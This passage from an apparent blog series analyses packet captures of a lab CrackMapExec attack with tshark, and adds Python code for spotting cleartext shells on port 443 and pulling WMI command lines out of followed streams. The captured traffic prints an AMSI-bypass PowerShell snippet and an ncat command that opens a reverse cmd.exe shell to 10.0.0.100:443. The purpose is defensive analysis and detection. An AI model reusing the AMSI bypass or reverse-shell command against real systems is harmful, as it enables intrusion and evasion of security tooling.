  177  44.960333   10.0.0.100 → 10.0.0.105   DCERPC 2738 Request: call_id: 9, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  181  44.992849   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 9, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
The above looks interesting in that there is some cleartext. Let's follow the stream to see if we find anything of interest. Please note I've edited the output below for brevity and kept only what I believe was important.
root@securitynik:~/cme# tshark -q -n -r cme-powershell.pcap -n -z follow,tcp,ascii,10.0.0.100:37794,10.0.0.105:49666
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.100 and tcp.srcport eq 37794) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666)) or ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 37794))
Node 0: 10.0.0.100:37794
Node 1: 10.0.0.105:49666
112
....5..NTLMSSP.........p...".".........@.......V.......p...........5...S.E.C.U.R.I.T.Y.N.I.K.a.d.m.i.n.i.s.t.r.a.t.o.r....T...J7..7...bOk63ZTRY........i.4.............`J9K....Ok63ZTRY........S.E.C.N.I.K.-.2.K.1.9.....S.E.C.U.R.I.T.Y.N.I.K...:.S.E.C.N.I.K.-.2.K.1.9...s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l.....`J9K...... .c.i.f.s./.S.E.C.N.I.K.-.2.K.1.9......... .).yPDg...Q' S.
156
................\................@ic#..................l..9H...*..?#....c..............././.../.r.o.o.t./.c.i.m.v.2................. .....................................................................................................q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1..C:\....C........... ....5......s.H.........
..........................................................................................................................................................................................................................................................p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\AZGdHz 2>&1..C:\.>A.......... ....5.........n..[H....
..D.................object:Win32_ProcessStartup.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$........0......................__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded 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 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1..C:\.FF.......... ....5......hj..h$......
===================================================================
As we can see from above, we seem to have some PowerShell code being executed. However, we do not see any results. This is still good, as at least we have something of interest at this point. Let's copy this code and decode it at the Linux command line.
root@securitynik:~/cme# echo "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" | base64 --decode
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{}
get-process
From above, we can conclude that the "get-process" cmdlet was executed via PowerShell.
No more analysis for us to do on this pcap file via tshark.
Now that we know what a PowerShell command may look like when run via crackmapexec, let's take a look at a "normal" command being executed. In this case, if you remember, in the first post we executed "ncat.exe"; let's see how we may be able to detect this with raw packet analysis.
As always, let's first look at the protocol hierarchy of our pcap.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:

eth                                      frames:356 bytes:86187
  ip                                     frames:356 bytes:86187
    tcp                                  frames:356 bytes:86187
      nbss                               frames:160 bytes:34441
        smb                              frames:3 bytes:381
        smb2                             frames:157 bytes:34060
      dcerpc                             frames:31 bytes:39474
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
      data                               frames:13 bytes:989
      ssl                                frames:14 bytes:1075
        tcp.segments                     frames:4 bytes:256
===================================================================
Now that we have the protocol hierarchy, let's look at the TCP conversations.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
                                           |       <-      | |       ->      | |     Total     |    Relative    |  Duration  |
                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |            |
10.0.0.100:57950 <-> 10.0.0.105:445            86     15850     100     15434     186     31284     0.023652000        20.0220
10.0.0.105:50602 <-> 10.0.0.100:443            29      1600      28      2126      57      3726     3.366351000        32.4745
10.0.0.105:49666 <-> 10.0.0.100:43388          26      9658      23     28398      49     38056     0.145434000        19.8985
10.0.0.100:57952 <-> 10.0.0.105:445            14      2952      15      2945      29      5897     0.042055000        19.9831
10.0.0.100:57948 <-> 10.0.0.105:445             9      1638      10      1166      19      2804     0.000000000        20.0444
10.0.0.100:60342 <-> 10.0.0.105:135             7      2808       9      1612      16      4420     0.098815000        19.9435
================================================================================
If we look at the first conversation above, we see it has the most bytes (15850). However, as we look at the second conversation, we see it has the longest duration of all the conversations (3.366 seconds). While we can start with the first conversation, I will instead in the interest of time start with the second, simply because it has the longest duration.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -Y "( tcp.port == 50602 ) && ( tcp.port == 443 )" | more
  190   3.366351   10.0.0.105 → 10.0.0.100   TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
  191   3.366379   10.0.0.100 → 10.0.0.105   TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128
  192   3.366597   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0
  200   3.496322   10.0.0.105 → 10.0.0.100   TCP 96 50602 → 443 [PSH, ACK] Seq=1 Ack=1 Win=2102272 Len=42
  201   3.496342   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=43 Win=29312 Len=0
  202   3.496527   10.0.0.105 → 10.0.0.100   SSL 110 Continuation Data
  203   3.496533   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=99 Win=29312 Len=0
  204   3.511061   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  205   3.511078   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=101 Win=29312 Len=0
............
  347  30.994013   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  348  30.994030   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=545 Win=29312 Len=0
  349  30.994182   10.0.0.105 → 10.0.0.100   SSL 60 Continuation Data
  350  30.994188   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=549 Win=29312 Len=0
  351  35.836894   10.0.0.100 → 10.0.0.105   TCP 59 443 → 50602 [PSH, ACK] Seq=18 Ack=549 Win=29312 Len=5
  352  35.837355   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [PSH, ACK] Seq=549 Ack=23 Win=2102272 Len=5
  353  35.837371   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=23 Ack=554 Win=29312 Len=0
  354  35.840523   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [FIN, ACK] Seq=554 Ack=23 Win=2102272 Len=0
  355  35.840639   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [FIN, ACK] Seq=23 Ack=555 Win=29312 Len=0
  356  35.840840   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=555 Ack=24 Win=2102272 Len=0
From above, we see port 443, which suggests SSL communication. However, we see no SSL negotiation, which is typically done right after the 3-way handshake is completed. Considering there is no SSL negotiation, is there a possibility that we may be able to see the cleartext data? Let's reassemble the session by following the TCP stream to see what we get.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:50602,10.0.0.100:443 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 50602) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 443)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 443) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 50602))
Node 0: 10.0.0.105:50602
Node 1: 10.0.0.100:443
42
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>
whoami
whoami
securitynik\administrator

C:\>
net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
nakia                    neysa                    nik
Prague                   saadia                   securitynik
The command completed with one or more errors.

C:\>
exit
exit
Ahhh, from above we see that even though the traffic is on port 443, this communication is not encrypted. Interesting!
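The check made by eye above (port 443, but no SSL negotiation after the 3-way handshake) can be automated. This is an added example and not code from the original post; the first-payload samples and the tshark summary lines are constructed to match what the listing above shows.

```python
"""Tell a real TLS session on port 443 from the cleartext shell seen above.

Added example, not from the original post. The port number only suggests
TLS; the ncat session above carries a plain cmd.exe banner on 443. Every TLS
session starts with a handshake record (0x16, version 0x03 0x0N) whose first
message is a ClientHello (0x01), so the first bytes each side sends settle it.
"""

# Constructed samples. In the ncat case the victim (10.0.0.105) is the TCP
# client and its cmd.exe sends the banner first; the listener replies with
# commands. The TLS sample is a ClientHello record header plus zero filler.
NCAT_CLIENT_FIRST = (b"Microsoft Windows [Version 10.0.17763.253]\r\n"
                     b"(c) 2018 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\>")
NCAT_SERVER_FIRST = b"whoami\r\n"
TLS_CLIENT_FIRST = bytes.fromhex("16030100a5010000a10303") + b"\x00" * 160

# Constructed tshark one-line summaries shaped like the listing above.
SAMPLE_SUMMARY = [
    "190 3.366351 10.0.0.105 → 10.0.0.100 TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0",
    "191 3.366379 10.0.0.100 → 10.0.0.105 TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0",
    "192 3.366597 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0",
    "202 3.496527 10.0.0.105 → 10.0.0.100 SSL 110 Continuation Data",
    "349 30.994182 10.0.0.105 → 10.0.0.100 SSL 60 Continuation Data",
]


def is_tls_client_hello(data: bytes) -> bool:
    """TLS record header: type 0x16 (handshake), version 0x03 0x00..0x04,
    2-byte length, then handshake type 0x01 (ClientHello)."""
    if len(data) < 6:
        return False
    return data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04 and data[5] == 0x01


def looks_like_shell(data: bytes) -> bool:
    """Heuristic for cmd.exe bound to a socket, which is what ncat --exec cmd.exe produces."""
    markers = (b"Microsoft Windows [Version", b"C:\\>", b"All rights reserved.")
    return any(m in data for m in markers)


def classify_443(client_first: bytes, server_first: bytes) -> str:
    """Classify a port-443 conversation from the first payload each side sent."""
    if is_tls_client_hello(client_first):
        return "tls"
    if looks_like_shell(client_first) or looks_like_shell(server_first):
        return "plaintext-shell"
    return "unknown"


def tls_handshake_missing(summary_lines) -> bool:
    """The same observation made from tshark's one-line view: the dissector
    labelled frames SSL (by port) but never saw a Client Hello."""
    ssl_seen = any(" SSL " in line for line in summary_lines)
    hello_seen = any("Client Hello" in line for line in summary_lines)
    return ssl_seen and not hello_seen


if __name__ == "__main__":
    print(classify_443(NCAT_CLIENT_FIRST, NCAT_SERVER_FIRST))  # plaintext-shell
    print(classify_443(TLS_CLIENT_FIRST, b""))                 # tls
    print(tls_handshake_missing(SAMPLE_SUMMARY))               # True
```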
If we go through the other conversations, we see mostly unreadable traffic. However, as we follow the stream for the conversation with "10.0.0.105:49666" and "10.0.0.100:43388", we see the following:
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:49666,10.0.0.100:43388 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 43388)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 43388) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666))
Node 0: 10.0.0.100:43388
Node 1: 10.0.0.105:49666
...... .......................f..... ..D.................object:Win32_ProcessStartup................................................................................................................ .............................................................................................................................................................................................
...........q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\YkGcDv 2>&1..C:\....ri.......... ....5.......,L....f....
............................................................................................................................................................................................. .............................................................................................................................................................................................
...........p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\egHJIv 2>&1..C:\..I.......... ....5....... h...r@....
.............................................................................................................................................................................................
....................0......................__PARAMETERS..cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1..C:\.Cg.......... ....5..........WG......
From the rebuilt session above we see, amongst other items, "ncat.exe" being executed with various arguments.
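Both followed streams, the PowerShell one earlier and the ncat one just above, carry the same Win32_Process command shape: cmd.exe /Q /c <command> 1> \\127.0.0.1\C$\Windows\Temp\<random> 2>&1. The following is an added example, not code from the original post or from CrackMapExec, that pulls those command lines out of a constructed dump in that shape, decodes a -encoded payload (PowerShell expects base64 of UTF-16LE; SAMPLE_B64 is built here from a constructed "get-process" script) and flags the indicators seen on this page.

```python
"""Extract WMI command lines from a followed TCP stream dump.

Added example, not from the original post. The DCERPC stream to port 49666
shows Win32_Process.Create calls whose command line redirects output to the
local admin share (C$\Windows\Temp\<6 chars>), which is later read back over
SMB. That redirection is the distinctive part to match on.
"""
import base64
import re

# Constructed sample: "get-process" encoded the way powershell -encoded
# expects it (UTF-16LE, then base64), wrapped in the page's cmd.exe pattern.
SAMPLE_B64 = base64.b64encode("get-process".encode("utf-16-le")).decode("ascii")
SAMPLE_DUMP = (
    "Node 0: 10.0.0.100:43388\nNode 1: 10.0.0.105:49666\n"
    "..D.....object:Win32_ProcessStartup.......__PARAMETERS..cmd.exe /Q /c cd \\ "
    "1> \\\\127.0.0.1\\C$\\Windows\\Temp\\YkGcDv 2>&1..C:\\....ri..\n"
    "......__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden "
    "-noni -nop -encoded " + SAMPLE_B64 +
    " 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\RvhXCV 2>&1..C:\\.FF\n"
)

CMD_RE = re.compile(
    r"cmd\.exe /Q /c (?P<cmd>.+?) 1> \\\\127\.0\.0\.1\\C\$\\Windows\\Temp\\(?P<tmp>\w+) 2>&1"
)
# -enc, -encoded, -EncodedCommand ... followed by the base64 blob.
ENC_RE = re.compile(r"-enc\w*\s+(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings worth flagging, taken from the decoded script shown on this page.
INDICATORS = ("amsiInitFailed", "ServerCertificateValidationCallback", "-exec bypass")


def decode_encoded_command(b64: str) -> str:
    """powershell -encoded takes base64 of UTF-16LE. Fall back to UTF-8 for a
    blob that was base64'd as plain text (as the page's echo | base64 shows)."""
    raw = base64.b64decode(b64)
    if b"\x00" in raw:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_commands(dump: str) -> list:
    """Return one record per Win32_Process command line found in the dump."""
    results = []
    for m in CMD_RE.finditer(dump):
        cmd = m.group("cmd")
        rec = {"command": cmd, "output_file": m.group("tmp"), "decoded": None, "flags": []}
        enc = ENC_RE.search(cmd)
        if enc:
            rec["decoded"] = decode_encoded_command(enc.group("b64"))
        haystack = (cmd + (rec["decoded"] or "")).lower()
        rec["flags"] = [i for i in INDICATORS if i.lower() in haystack]
        results.append(rec)
    return results


if __name__ == "__main__":
    for r in extract_commands(SAMPLE_DUMP):
        print(r)
```

The same extraction works on the raw output of tshark -z follow,tcp,ascii, since the matched text is embedded as-is in the NDR-encoded stub data.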
Ok. That's it for this post.
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis